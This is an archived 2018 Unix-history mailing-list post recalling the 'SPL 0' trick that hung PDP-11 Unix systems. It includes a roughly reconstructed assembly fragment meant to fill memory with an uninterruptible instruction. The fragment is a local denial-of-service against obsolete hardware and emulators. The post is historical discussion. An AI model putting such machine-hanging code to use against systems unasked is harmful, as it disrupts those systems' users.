* [TUHS] That "SPL 0" instruction...
@ 2018-04-09 6:18 Dave Horsfall
0 siblings, 0 replies; only message in thread
From: Dave Horsfall @ 2018-04-09 6:18 UTC (permalink / raw)
A nerdy group on an Aussie list are discussing old Unix cracks, and the
infamous "SPL 0" brick-that-box came up. I first saw it in ";login:" (I
think), and, err, tried it (as did others)...
Can anyone reproduce the code? It went something like:
> [ SPL 0 ]
>
> I only did that once (and you should've heard what he said to me)...
> I'm still trying to find the source for it (it was published in a
> ";login:" journal) to see if SIMH is vulnerable.
The concept was simple enough - fill your entire memory space with an uninterruptible instruction. It would have gone something like:
opc = 000230 ; 000230 is the opcode for SPL 0
sys brk, -1 ; or whatever value got you all 64k of address space
mov #place, sp
jmp place
. = opc - 2 ; the -2 is to allow for the PC increment on an instruction fetch, which I believe happens before any execution
place:
jsr pc, -(pc)
Ring any bells, anyone?
--
Dave Horsfall DTM (VK2KFU) "Those who don't understand security will suffer."
^ permalink raw reply [flat|nested] only message in thread
only message in thread, other threads:[~2018-04-09 6:18 UTC | newest]
Thread overview: (only message) (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2018-04-09 6:18 [TUHS] That "SPL 0" instruction Dave Horsfall
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).